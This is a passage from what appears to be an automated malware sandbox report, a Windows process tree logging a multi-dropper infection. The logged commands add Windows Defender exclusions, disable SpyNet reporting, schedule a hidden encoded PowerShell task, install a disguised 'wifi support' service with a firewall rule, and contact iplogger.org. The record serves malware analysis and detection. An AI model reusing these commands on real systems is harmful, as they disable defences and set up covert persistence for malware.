"C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe"
3⤵
PID:5596

C:\Users\Admin\Pictures\Adobe Films\mPhURYpp548_5fhDh832yVx_.exe
"C:\Users\Admin\Pictures\Adobe Films\mPhURYpp548_5fhDh832yVx_.exe"
3⤵
PID:5708

C:\Users\Admin\Pictures\Adobe Films\mPhURYpp548_5fhDh832yVx_.exe
"C:\Users\Admin\Pictures\Adobe Films\mPhURYpp548_5fhDh832yVx_.exe"
4⤵
PID:6428

C:\Users\Admin\Pictures\Adobe Films\HzpGzhWIno_vT3DPEugHGvh6.exe
"C:\Users\Admin\Pictures\Adobe Films\HzpGzhWIno_vT3DPEugHGvh6.exe"
3⤵
PID:5324

C:\Users\Admin\Pictures\Adobe Films\F9HtjYya5PDc7U_FqoqERAjG.exe
"C:\Users\Admin\Pictures\Adobe Films\F9HtjYya5PDc7U_FqoqERAjG.exe"
3⤵
PID:5784

C:\Users\Admin\Pictures\Adobe Films\F9HtjYya5PDc7U_FqoqERAjG.exe
"C:\Users\Admin\Pictures\Adobe Films\F9HtjYya5PDc7U_FqoqERAjG.exe"
4⤵
PID:6552

C:\Users\Admin\Pictures\Adobe Films\Dmrn6JqtoTeDopZ_p1d5jZku.exe
"C:\Users\Admin\Pictures\Adobe Films\Dmrn6JqtoTeDopZ_p1d5jZku.exe"
3⤵
PID:5712

C:\Users\Admin\Pictures\Adobe Films\gjDm9KiO4xUbUDTjOOguLaPb.exe
"C:\Users\Admin\Pictures\Adobe Films\gjDm9KiO4xUbUDTjOOguLaPb.exe"
3⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\7zS529D.tmp\Install.exe
.\Install.exe
4⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\7zS86BD.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:5780

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:6184

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:1092

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6960

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5344

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:6640

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:1132

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNKZOhOpu" /SC once /ST 00:50:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:6768

C:\Users\Admin\Pictures\Adobe Films\CPi9NzlGsl7zacot60XWB_cK.exe
"C:\Users\Admin\Pictures\Adobe Films\CPi9NzlGsl7zacot60XWB_cK.exe"
3⤵
PID:2432

C:\Users\Admin\Pictures\Adobe Films\CPi9NzlGsl7zacot60XWB_cK.exe
"C:\Users\Admin\Pictures\Adobe Films\CPi9NzlGsl7zacot60XWB_cK.exe"
4⤵
PID:6316

C:\Users\Admin\Pictures\Adobe Films\o38ApaWWwlENfaNc0NQem4I_.exe
"C:\Users\Admin\Pictures\Adobe Films\o38ApaWWwlENfaNc0NQem4I_.exe"
3⤵
PID:2376

C:\Users\Admin\Pictures\Adobe Films\DPidzNklyNWP99VCd2ig8wi4.exe
"C:\Users\Admin\Pictures\Adobe Films\DPidzNklyNWP99VCd2ig8wi4.exe"
3⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hlytctyv\
4⤵
PID:4664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bbintmvs.exe" C:\Windows\SysWOW64\hlytctyv\
4⤵
PID:4924

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create hlytctyv binPath= "C:\Windows\SysWOW64\hlytctyv\bbintmvs.exe /d\"C:\Users\Admin\Pictures\Adobe Films\DPidzNklyNWP99VCd2ig8wi4.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:6940

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description hlytctyv "wifi internet conection"
4⤵
PID:5032

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start hlytctyv
4⤵
PID:5652

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 1212
4⤵
PID:6492

C:\Users\Admin\Pictures\Adobe Films\ZENwstoCOvj4kyxegUeAFaW7.exe
"C:\Users\Admin\Pictures\Adobe Films\ZENwstoCOvj4kyxegUeAFaW7.exe"
3⤵
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 472
4⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 480
4⤵
- Program crash
PID:6980

C:\Users\Admin\Pictures\Adobe Films\qVSY5UtnGbP_4lTRaeTRslRz.exe
"C:\Users\Admin\Pictures\Adobe Films\qVSY5UtnGbP_4lTRaeTRslRz.exe"
3⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 464
4⤵
- Program crash
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 472
4⤵
PID:3908

C:\Users\Admin\Pictures\Adobe Films\SbXnknyq8ksCOBeyI80qElCR.exe
"C:\Users\Admin\Pictures\Adobe Films\SbXnknyq8ksCOBeyI80qElCR.exe"
3⤵
PID:2360

C:\Users\Admin\Pictures\Adobe Films\cUZkdsEegxYehFa93ih7QuEe.exe
"C:\Users\Admin\Pictures\Adobe Films\cUZkdsEegxYehFa93ih7QuEe.exe"
3⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\A6HBD.exe
"C:\Users\Admin\AppData\Local\Temp\A6HBD.exe"
4⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\E409F.exe
"C:\Users\Admin\AppData\Local\Temp\E409F.exe"
4⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\HJ0DI.exe
"C:\Users\Admin\AppData\Local\Temp\HJ0DI.exe"
4⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\5H0BK.exe
"C:\Users\Admin\AppData\Local\Temp\5H0BK.exe"
4⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\5H0BK9HMMGHH15B.exe
https://iplogger.org/1OUvJ
4⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\5H0BK.exe
"C:\Users\Admin\AppData\Local\Temp\5H0BK.exe"
4⤵
PID:5128

C:\Users\Admin\Pictures\Adobe Films\g5DwWYBPiU4sBDGLgSvU5E5H.exe
"C:\Users\Admin\Pictures\Adobe Films\g5DwWYBPiU4sBDGLgSvU5E5H.exe"
3⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 464
4⤵
- Program crash
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 484
4⤵
PID:6984

C:\Users\Admin\Pictures\Adobe Films\aSoNj1UHSb2ESOnwXt3TZdGw.exe
"C:\Users\Admin\Pictures\Adobe Films\aSoNj1UHSb2ESOnwXt3TZdGw.exe"
3⤵
PID:5876

C:\Users\Admin\Pictures\Adobe Films\k2ZVKiESVPbjNv5AmXVUHAUJ.exe
"C:\Users\Admin\Pictures\Adobe Films\k2ZVKiESVPbjNv5AmXVUHAUJ.exe"
3⤵
PID:5836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:6776

C:\Users\Admin\Pictures\Adobe Films\0VyGMEvAUJJs_3A8FUfquFmA.exe
"C:\Users\Admin\Pictures\Adobe Films\0VyGMEvAUJJs_3A8FUfquFmA.exe"
3⤵
PID:5864

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
4⤵
PID:6260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
4⤵
PID:6380

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6852

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:4688

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:3800

C:\Users\Admin\Pictures\Adobe Films\v_3ik1bItw5P05c2DcgkPIqj.exe
"C:\Users\Admin\Pictures\Adobe Films\v_3ik1bItw5P05c2DcgkPIqj.exe"
3⤵
PID:4956

C:\Users\Admin\Pictures\Adobe Films\QjG8ZQrRdHyofbIj5vPncxDJ.exe
"C:\Users\Admin\Pictures\Adobe Films\QjG8ZQrRdHyofbIj5vPncxDJ.exe"
3⤵
PID:4396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0xfc,0x100,0x80,0x104,0x7ffe858846f8,0x7ffe85884708,0x7ffe85884718
3⤵
PID:220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2660 /prefetch:2
3⤵
PID:4840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2900 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
3⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
3⤵
PID:3580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
3⤵
PID:948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4824 /prefetch:8
3⤵
PID:3884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
3⤵
PID:312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
3⤵
PID:3488

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
3⤵
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:6080

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6586e5460,0x7ff6586e5470,0x7ff6586e5480
4⤵
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2444,11887810633749172704,9149601353858159372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
3⤵
PID:1720

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 600
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 480 -ip 480
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 4668
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4668 -ip 4668
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4668 -ip 4668
1⤵
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 4668
1⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4668 -ip 4668
1⤵
PID:3224

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4668 -ip 4668
1⤵
PID:3104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4668 -ip 4668
1⤵
PID:3488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4668 -ip 4668
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4668 -ip 4668
1⤵
PID:2764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4668 -ip 4668
1⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4668 -ip 4668
1⤵
PID:1976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4668 -ip 4668
1⤵
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4668 -ip 4668
1⤵
PID:920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 4668
1⤵
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4668 -ip 4668
1⤵
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668
1⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4668 -ip 4668
1⤵
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4668 -ip 4668
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4668 -ip 4668
1⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4668 -ip 4668
1⤵
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4668 -ip 4668
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3600 -ip 3600
1⤵
PID:3284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3600 -ip 3600
1⤵
PID:836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3600 -ip 3600
1⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3600 -ip 3600
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3600 -ip 3600
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3600 -ip 3600
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3600 -ip 3600
1⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3600 -ip 3600
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3600 -ip 3600
1⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3600 -ip 3600
1⤵
PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3600 -ip 3600
1⤵
PID:5216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3600 -ip 3600
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3600 -ip 3600
1⤵
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3600 -ip 3600
1⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3600 -ip 3600
1⤵
PID:5376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3600 -ip 3600
1⤵
PID:5520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5700 -ip 5700
1⤵
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5700 -ip 5700
1⤵
PID:5184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5700 -ip 5700
1⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5700 -ip 5700
1⤵
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5700 -ip 5700
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5700 -ip 5700
1⤵
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5700 -ip 5700
1⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5700 -ip 5700
1⤵
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5700 -ip 5700
1⤵
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5700 -ip 5700
1⤵
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5700 -ip 5700
1⤵
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5700 -ip 5700
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5700 -ip 5700
1⤵
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5700 -ip 5700
1⤵
PID:1132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5700 -ip 5700
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5700 -ip 5700
1⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5700 -ip 5700
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6084 -ip 6084
1⤵
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5700 -ip 5700
1⤵
PID:836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4396 -ip 4396
1⤵
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1268 -ip 1268
1⤵
PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2456 -ip 2456
1⤵
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4956 -ip 4956
1⤵
PID:740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4752 -ip 4752
1⤵
PID:5440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4956 -ip 4956
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4396 -ip 4396
1⤵
PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5412 -ip 5412
1⤵
PID:6488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5700 -ip 5700
1⤵
PID:6844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1268 -ip 1268
1⤵
PID:6936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5700 -ip 5700
1⤵
PID:7124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5412 -ip 5412
1⤵
PID:2280

C:\Windows\SysWOW64\WerFault.exe
